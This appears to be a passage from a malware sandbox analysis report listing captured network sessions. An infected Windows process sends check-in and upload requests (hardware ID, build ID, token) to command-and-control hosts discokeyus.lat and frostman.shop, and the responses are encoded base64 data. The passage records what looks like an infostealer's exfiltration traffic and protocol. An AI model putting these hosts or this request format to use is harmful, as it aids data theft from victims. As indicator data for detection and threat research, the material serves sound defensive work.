                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:15:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          36192.168.2.550157172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:53 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 47
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:15:53 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                                                          2024-12-21 00:15:53 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:53 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=hrk0kkj27na3dkss55hkmpqvgu; expires=Tue, 15 Apr 2025 18:02:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0iOuNPWNcBcNy5UVFWF%2BeBA8zA8iEgD%2BVWSlTZTJahnmoGzQCh9isd%2F8Bo9XOcSd%2BoKMF2wqTFowxYs%2FHfptvqKVjhgKjoa%2FwkPr9nJCGFf08ggGR%2Fo7gI%2FzPEn65Q3tKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ae25fcf50f8f-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1693&min_rtt=1680&rtt_var=657&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=945&delivery_rate=1630374&cwnd=232&unsent_bytes=0&cid=83cbb21fbe56dbd8&ts=770&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:15:53 UTC234INData Raw: 34 36 62 0d 0a 66 6c 50 76 38 4e 6f 69 54 4e 4d 48 75 64 75 39 34 62 39 44 34 66 4d 39 47 32 59 7a 4e 36 31 2f 31 53 63 6f 64 50 4f 50 35 59 6f 46 63 5a 6e 53 34 42 5a 67 38 58 54 63 2b 59 65 56 7a 54 61 45 33 78 39 36 41 68 45 4e 79 78 36 35 56 45 31 59 30 66 6d 49 71 45 51 31 6a 70 79 70 52 32 44 78 59 73 48 35 68 37 72 45 59 59 53 64 48 79 46 45 56 6c 33 50 48 72 6c 46 53 52 2b 63 2f 34 6e 70 46 6a 2b 49 6d 4c 39 42 4b 4c 4a 72 31 4c 37 59 68 4e 34 70 6a 35 70 51 63 77 73 52 47 34 38 61 72 77 55 53 56 72 37 71 6b 65 73 7a 4d 70 79 62 2b 46 39 67 71 43 58 63 74 5a 2f 62 6e 53 4b 45 6b 56 46 39 41 6c 68 66 78 52 65 78 52 45 77 65 67 2b 61 44 34 68 59 78 69 35 6d 31 53 44 79 2f 59 64 4f 31 33
                                                                                                                                                                                                                                                                          Data Ascii: 46bflPv8NoiTNMHudu94b9D4fM9G2YzN61/1ScodPOP5YoFcZnS4BZg8XTc+YeVzTaE3x96AhENyx65VE1Y0fmIqEQ1jpypR2DxYsH5h7rEYYSdHyFEVl3PHrlFSR+c/4npFj+ImL9BKLJr1L7YhN4pj5pQcwsRG48arwUSVr7qkeszMpyb+F9gqCXctZ/bnSKEkVF9AlhfxRexREweg+aD4hYxi5m1SDy/YdO13
                                                                                                                                                                                                                                                                          2024-12-21 00:15:53 UTC904INData Raw: 6f 37 65 59 63 33 52 57 47 46 45 43 52 57 63 4c 37 52 55 57 77 4f 63 2f 59 47 6f 41 33 2b 55 30 72 39 4d 62 75 6b 6c 30 37 58 52 68 74 34 75 68 4a 42 66 61 77 74 52 56 73 63 56 73 30 39 46 47 5a 37 6a 6a 65 38 55 4f 49 71 64 76 30 67 6f 76 6d 61 62 39 35 2b 45 78 57 48 62 30 58 39 70 42 31 4a 42 77 67 7a 33 57 67 51 50 30 65 71 4c 71 45 52 78 69 35 79 35 54 53 36 6a 62 64 43 79 32 70 48 57 4b 49 36 63 58 33 51 4f 58 6c 62 50 47 72 31 50 52 52 79 56 34 49 72 75 48 44 48 4e 33 50 68 48 4e 76 45 39 6d 35 72 61 6b 39 6f 74 6c 64 4e 6c 4f 52 73 66 54 49 38 61 75 77 55 53 56 70 6e 6f 68 4f 73 58 50 6f 36 61 73 31 49 75 6f 32 50 57 76 4d 32 46 32 43 2b 4a 6b 6b 31 7a 43 6c 64 57 78 68 61 2b 51 45 30 53 30 61 50 48 37 77 52 78 31 64 4b 5a 54 53 57 39 62 38 79 35
                                                                                                                                                                                                                                                                          Data Ascii: o7eYc3RWGFECRWcL7RUWwOc/YGoA3+U0r9Mbukl07XRht4uhJBfawtRVscVs09FGZ7jje8UOIqdv0govmab95+ExWHb0X9pB1JBwgz3WgQP0eqLqERxi5y5TS6jbdCy2pHWKI6cX3QOXlbPGr1PRRyV4IruHDHN3PhHNvE9m5rak9otldNlORsfTI8auwUSVpnohOsXPo6as1Iuo2PWvM2F2C+Jkk1zCldWxha+QE0S0aPH7wRx1dKZTSW9b8y5
                                                                                                                                                                                                                                                                          2024-12-21 00:15:53 UTC1369INData Raw: 34 34 62 31 0d 0a 66 55 58 34 53 45 55 71 42 42 50 64 43 52 6c 62 4a 72 59 6a 6e 45 7a 6d 4e 6b 37 78 4e 4b 72 42 6f 31 37 44 63 6a 39 45 70 6a 70 31 62 64 67 78 5a 56 73 63 50 75 55 74 4d 45 4a 48 6f 78 36 5a 63 4e 70 58 53 34 41 41 4b 76 33 4c 50 73 70 32 32 33 69 2b 4e 6c 6b 6b 35 47 78 39 4d 6a 78 71 37 42 52 4a 57 6e 2b 43 4d 35 42 73 34 6a 4a 47 34 53 69 43 2b 62 39 4f 78 33 34 37 63 4b 6f 75 58 55 6e 49 4c 58 6c 4c 48 48 72 74 41 52 78 58 52 6f 38 66 76 42 48 48 56 30 70 31 4f 4c 61 42 30 6d 59 7a 63 6a 64 4d 6d 6c 64 46 41 4e 78 30 52 55 73 4e 64 37 77 56 41 45 5a 62 70 69 75 49 66 4e 59 6d 66 74 30 6b 6e 75 48 66 52 74 64 47 52 30 43 75 47 6e 31 4e 38 43 31 46 55 7a 68 4f 39 54 67 70 59 30 65 71 66 71 45 52 78 6f 70 2b 6f 55 69 53 36 64 4a 6d 4d
                                                                                                                                                                                                                                                                          Data Ascii: 44b1fUX4SEUqBBPdCRlbJrYjnEzmNk7xNKrBo17Dcj9Epjp1bdgxZVscPuUtMEJHox6ZcNpXS4AAKv3LPsp223i+Nlkk5Gx9Mjxq7BRJWn+CM5Bs4jJG4SiC+b9Ox347cKouXUnILXlLHHrtARxXRo8fvBHHV0p1OLaB0mYzcjdMmldFANx0RUsNd7wVAEZbpiuIfNYmft0knuHfRtdGR0CuGn1N8C1FUzhO9TgpY0eqfqERxop+oUiS6dJmM
                                                                                                                                                                                                                                                                          2024-12-21 00:15:53 UTC1369INData Raw: 48 62 30 58 42 36 45 6c 73 56 30 46 4f 75 42 55 30 61 30 62 58 48 34 68 41 31 6a 70 36 78 54 43 4f 77 59 64 79 30 32 34 50 62 4a 34 61 51 56 48 45 49 58 6c 2f 44 47 62 74 4d 54 42 71 53 37 6f 47 6f 55 6e 47 4b 69 76 67 59 62 70 42 6f 30 4c 58 66 67 4d 77 6d 77 39 38 66 64 77 4a 52 46 5a 63 4c 70 31 4a 4e 43 64 2f 30 78 2b 38 51 63 64 58 53 73 6c 49 72 76 32 48 52 76 4e 75 50 31 79 47 47 67 31 64 2f 41 31 31 64 79 68 4b 78 51 45 63 52 6d 75 36 56 2b 68 38 31 67 35 37 34 44 6d 36 32 66 5a 76 68 6e 36 62 4b 49 70 4f 58 58 44 6b 62 48 30 79 50 47 72 73 46 45 6c 61 52 34 34 76 6a 47 7a 71 47 6c 72 78 41 49 37 70 72 31 62 44 54 69 39 45 6d 6b 5a 78 61 63 51 35 59 55 4d 4d 51 74 46 64 4a 46 39 47 6a 78 2b 38 45 63 64 58 53 6e 33 4d 5a 6b 69 58 45 39 38 62 44 32
                                                                                                                                                                                                                                                                          Data Ascii: Hb0XB6ElsV0FOuBU0a0bXH4hA1jp6xTCOwYdy024PbJ4aQVHEIXl/DGbtMTBqS7oGoUnGKivgYbpBo0LXfgMwmw98fdwJRFZcLp1JNCd/0x+8QcdXSslIrv2HRvNuP1yGGg1d/A11dyhKxQEcRmu6V+h81g574Dm62fZvhn6bKIpOXXDkbH0yPGrsFElaR44vjGzqGlrxAI7pr1bDTi9EmkZxacQ5YUMMQtFdJF9Gjx+8EcdXSn3MZkiXE98bD2
                                                                                                                                                                                                                                                                          2024-12-21 00:15:53 UTC1369INData Raw: 66 56 51 64 65 58 6f 38 43 2b 56 77 4b 45 5a 32 74 33 36 67 62 4f 59 57 63 75 30 59 6c 76 57 6e 61 73 4e 6d 47 31 53 61 4d 6c 6c 5a 2b 42 46 64 48 79 42 43 2b 52 55 45 66 6d 2b 6d 47 34 31 78 2f 7a 5a 57 67 41 48 62 78 56 39 79 76 7a 34 43 64 50 73 32 49 48 33 34 49 45 51 32 50 45 4b 56 45 54 77 53 56 34 6f 7a 36 46 7a 65 4e 6c 36 70 48 49 72 74 71 32 4c 48 53 67 4e 55 7a 67 35 78 66 61 78 5a 58 58 73 46 64 2b 51 56 4e 44 74 47 31 78 39 6b 4c 4f 73 32 4e 39 6c 6c 75 74 6d 6d 62 34 5a 2b 41 31 79 79 4e 67 31 74 2f 44 31 4a 62 78 78 69 2f 51 55 41 62 6e 75 61 4e 34 52 51 78 67 70 65 77 53 79 69 2f 5a 4e 32 31 30 73 4f 54 59 59 53 4a 48 79 46 45 64 6b 2f 43 47 36 42 55 66 78 47 52 76 4d 66 33 55 69 6a 4e 6c 62 51 41 64 76 46 6f 31 37 50 53 68 74 6b 70 68 4a
                                                                                                                                                                                                                                                                          Data Ascii: fVQdeXo8C+VwKEZ2t36gbOYWcu0YlvWnasNmG1SaMllZ+BFdHyBC+RUEfm+mG41x/zZWgAHbxV9yvz4CdPs2IH34IEQ2PEKVETwSV4oz6FzeNl6pHIrtq2LHSgNUzg5xfaxZXXsFd+QVNDtG1x9kLOs2N9llutmmb4Z+A1yyNg1t/D1Jbxxi/QUAbnuaN4RQxgpewSyi/ZN210sOTYYSJHyFEdk/CG6BUfxGRvMf3UijNlbQAdvFo17PShtkphJ
                                                                                                                                                                                                                                                                          2024-12-21 00:15:53 UTC1369INData Raw: 45 56 4c 44 58 65 38 46 52 42 75 58 37 49 62 67 46 44 47 4c 6d 4c 78 44 4a 37 4a 69 30 72 2f 55 67 4e 63 75 68 4a 64 62 65 51 39 57 57 38 6b 59 76 45 77 4b 57 4e 48 71 6e 36 68 45 63 61 75 78 71 6c 49 63 76 32 62 41 2b 63 44 4e 78 47 47 45 6e 52 38 68 52 46 70 64 77 41 2b 79 54 45 49 53 6d 4f 32 44 34 68 45 32 6a 5a 65 31 52 53 71 2f 59 64 79 35 30 34 7a 61 4b 59 79 56 58 33 5a 45 48 78 58 49 42 66 63 64 43 6a 61 61 2b 36 62 6d 46 79 50 4e 6a 66 5a 5a 62 72 5a 70 6d 2b 47 66 6a 64 51 67 69 35 39 54 63 51 42 44 56 63 51 55 75 45 52 46 46 70 4c 73 6a 65 41 4f 4e 34 32 5a 73 45 63 6d 74 57 76 4a 75 4e 44 44 6b 32 47 45 69 52 38 68 52 47 42 44 79 42 71 34 42 32 4d 52 69 75 79 4e 36 78 63 39 7a 59 33 32 57 57 36 32 61 5a 76 68 6e 34 37 52 4c 49 65 44 55 33 6b
                                                                                                                                                                                                                                                                          Data Ascii: EVLDXe8FRBuX7IbgFDGLmLxDJ7Ji0r/UgNcuhJdbeQ9WW8kYvEwKWNHqn6hEcauxqlIcv2bA+cDNxGGEnR8hRFpdwA+yTEISmO2D4hE2jZe1RSq/Ydy504zaKYyVX3ZEHxXIBfcdCjaa+6bmFyPNjfZZbrZpm+GfjdQgi59TcQBDVcQUuERFFpLsjeAON42ZsEcmtWvJuNDDk2GEiR8hRGBDyBq4B2MRiuyN6xc9zY32WW62aZvhn47RLIeDU3k
                                                                                                                                                                                                                                                                          2024-12-21 00:15:53 UTC1369INData Raw: 31 32 38 53 30 38 58 6e 65 65 41 35 67 34 77 68 35 36 35 52 79 6d 36 64 39 43 72 31 49 76 65 4c 34 75 59 58 33 63 45 55 46 6a 50 58 66 6b 46 54 51 37 52 74 63 66 4e 50 79 61 62 6d 50 70 6a 4f 61 64 76 33 4c 58 4a 69 4e 77 69 6c 5a 78 50 4f 55 6f 52 52 4d 67 4d 39 78 31 63 42 6f 62 71 6d 4b 59 46 63 59 71 65 2b 42 68 75 75 6d 72 56 74 4e 53 48 31 43 53 4c 6b 6c 70 38 44 6c 31 5a 7a 68 57 2b 54 30 38 54 6c 2b 65 45 35 68 4d 77 67 5a 61 78 54 69 66 78 4b 35 75 2b 78 38 4f 46 59 62 57 42 57 47 45 4a 51 52 66 39 48 71 5a 55 58 78 75 42 36 38 58 48 48 7a 32 4f 6c 37 39 51 62 71 34 72 77 76 6e 59 6a 35 31 35 77 35 46 62 64 51 64 57 57 38 41 51 75 45 4a 42 47 5a 76 6a 6c 65 63 5a 4f 59 47 61 74 56 49 6b 75 33 66 53 73 4e 4b 4e 31 54 4f 41 30 52 45 35 41 30 6b 56
                                                                                                                                                                                                                                                                          Data Ascii: 128S08XneeA5g4wh565Rym6d9Cr1IveL4uYX3cEUFjPXfkFTQ7RtcfNPyabmPpjOadv3LXJiNwilZxPOUoRRMgM9x1cBobqmKYFcYqe+BhuumrVtNSH1CSLklp8Dl1ZzhW+T08Tl+eE5hMwgZaxTifxK5u+x8OFYbWBWGEJQRf9HqZUXxuB68XHHz2Ol79Qbq4rwvnYj515w5FbdQdWW8AQuEJBGZvjlecZOYGatVIku3fSsNKN1TOA0RE5A0kV
                                                                                                                                                                                                                                                                          2024-12-21 00:15:53 UTC1369INData Raw: 73 49 4a 34 66 67 6c 2b 73 5a 4e 72 4f 73 74 6b 63 36 74 6d 76 64 75 5a 2f 4e 6e 53 37 44 79 57 59 35 54 42 46 71 67 56 32 76 42 52 4a 57 70 4f 36 4a 35 68 73 6e 6e 4e 2b 62 56 7a 69 37 66 70 6d 66 32 4a 4c 55 4e 34 36 44 48 7a 64 45 56 78 57 58 54 66 6b 46 54 67 66 52 74 64 65 36 52 32 54 65 78 65 67 53 4d 66 39 38 6d 36 2b 66 32 34 39 76 77 34 4d 66 49 55 51 57 56 74 30 50 73 55 5a 63 46 64 62 54 75 63 67 58 4a 34 79 66 73 30 77 51 6a 33 44 59 74 39 47 45 79 7a 44 44 33 78 39 32 52 41 6c 73 6a 31 58 33 65 67 52 57 69 61 33 66 71 43 6b 79 67 35 79 2f 56 6a 2f 38 52 64 43 76 33 6f 37 57 4c 63 47 51 55 6d 6b 44 45 52 75 50 47 2f 63 64 47 6c 6a 52 36 5a 61 6f 52 47 48 66 79 65 30 54 65 65 45 33 78 50 66 47 77 38 74 68 32 38 4d 52 4f 52 59 52 44 59 39 61 74
                                                                                                                                                                                                                                                                          Data Ascii: sIJ4fgl+sZNrOstkc6tmvduZ/NnS7DyWY5TBFqgV2vBRJWpO6J5hsnnN+bVzi7fpmf2JLUN46DHzdEVxWXTfkFTgfRtde6R2TexegSMf98m6+f249vw4MfIUQWVt0PsUZcFdbTucgXJ4yfs0wQj3DYt9GEyzDD3x92RAlsj1X3egRWia3fqCkyg5y/Vj/8RdCv3o7WLcGQUmkDERuPG/cdGljR6ZaoRGHfye0TeeE3xPfGw8th28MRORYRDY9at
                                                                                                                                                                                                                                                                          2024-12-21 00:15:53 UTC1369INData Raw: 53 2f 49 54 6f 46 33 48 44 30 72 34 41 64 75 4d 72 6d 37 33 4f 77 34 56 78 30 63 6f 4b 4b 6c 4d 42 42 39 42 54 72 67 56 63 56 73 6d 2f 79 61 67 4f 63 64 58 53 2f 30 4d 38 6f 32 50 59 72 39 7a 45 34 78 2b 6c 6b 6c 68 2f 42 31 39 43 33 6c 2b 59 52 6b 45 61 6e 65 71 52 31 69 49 6b 6a 70 79 32 52 7a 69 67 4a 5a 58 35 30 4d 4f 46 47 4d 4f 41 56 58 35 49 47 52 6e 65 44 72 6c 4f 58 42 48 52 30 73 6d 6f 42 48 48 56 30 6f 31 44 49 4c 39 69 7a 61 69 53 70 64 34 6d 68 5a 4a 52 62 68 55 52 47 34 38 62 39 78 30 59 57 4e 48 70 6c 71 68 45 59 64 2f 4a 37 52 4e 35 34 54 66 45 39 38 62 44 79 32 48 62 77 68 45 35 46 68 45 4e 6a 31 71 35 53 45 73 56 6e 2b 36 56 2b 68 6f 79 6d 35 48 2f 66 68 43 55 61 4e 61 38 30 59 54 6a 48 36 4b 62 54 33 51 4c 56 6d 76 78 4b 71 5a 43 57 6c
                                                                                                                                                                                                                                                                          Data Ascii: S/IToF3HD0r4AduMrm73Ow4Vx0coKKlMBB9BTrgVcVsm/yagOcdXS/0M8o2PYr9zE4x+lklh/B19C3l+YRkEaneqR1iIkjpy2RzigJZX50MOFGMOAVX5IGRneDrlOXBHR0smoBHHV0o1DIL9izaiSpd4mhZJRbhURG48b9x0YWNHplqhEYd/J7RN54TfE98bDy2HbwhE5FhENj1q5SEsVn+6V+hoym5H/fhCUaNa80YTjH6KbT3QLVmvxKqZCWl


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          37192.168.2.550158116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:54 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----FCTR1D2DTRQQIMGVASJ5
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:54 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 54 52 31 44 32 44 54 52 51 51 49 4d 47 56 41 53 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 54 52 31 44 32 44 54 52 51 51 49 4d 47 56 41 53 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 54 52 31 44 32 44 54 52 51 51 49 4d 47 56 41 53 4a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------FCTR1D2DTRQQIMGVASJ5Content-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------FCTR1D2DTRQQIMGVASJ5Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------FCTR1D2DTRQQIMGVASJ5Cont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:54 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:15:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          38192.168.2.550161172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:55 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=LZ2TDEBO9OACBMY1P
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 12829
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:15:55 UTC12829OUTData Raw: 2d 2d 4c 5a 32 54 44 45 42 4f 39 4f 41 43 42 4d 59 31 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 5a 32 54 44 45 42 4f 39 4f 41 43 42 4d 59 31 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 5a 32 54 44 45 42 4f 39 4f 41 43 42 4d 59 31 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d
                                                                                                                                                                                                                                                                          Data Ascii: --LZ2TDEBO9OACBMY1PContent-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--LZ2TDEBO9OACBMY1PContent-Disposition: form-data; name="pid"2--LZ2TDEBO9OACBMY1PContent-Disposition: form-data; name="lid"PsFKDg--pablo-
                                                                                                                                                                                                                                                                          2024-12-21 00:15:56 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:56 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=n8ihdiqcpl6h3onm70af5qk4kt; expires=Tue, 15 Apr 2025 18:02:35 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TqS5nuIaow6D1JK0wA27qCw2OOpfbE41VQkYlxe9Eqy35e0jwhyBtaSf9IMKwj16yampcgBMEtEg%2B7Cyo4USKYIpM1bRZSXnB0ScgY5BJPky8M78Ufx8%2By6dft0maONAMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ae360b098cc0-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1945&min_rtt=1914&rtt_var=780&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2833&recv_bytes=13766&delivery_rate=1348107&cwnd=222&unsent_bytes=0&cid=e19e16a6548687a6&ts=876&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:15:56 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:15:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          39192.168.2.550163172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:57 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=TGK5TG3JF0VQC7J
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 16318
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:15:57 UTC15331OUTData Raw: 2d 2d 54 47 4b 35 54 47 33 4a 46 30 56 51 43 37 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 54 47 4b 35 54 47 33 4a 46 30 56 51 43 37 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 47 4b 35 54 47 33 4a 46 30 56 51 43 37 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 54 47 4b 35 54
                                                                                                                                                                                                                                                                          Data Ascii: --TGK5TG3JF0VQC7JContent-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--TGK5TG3JF0VQC7JContent-Disposition: form-data; name="pid"2--TGK5TG3JF0VQC7JContent-Disposition: form-data; name="lid"PsFKDg--pablo--TGK5T
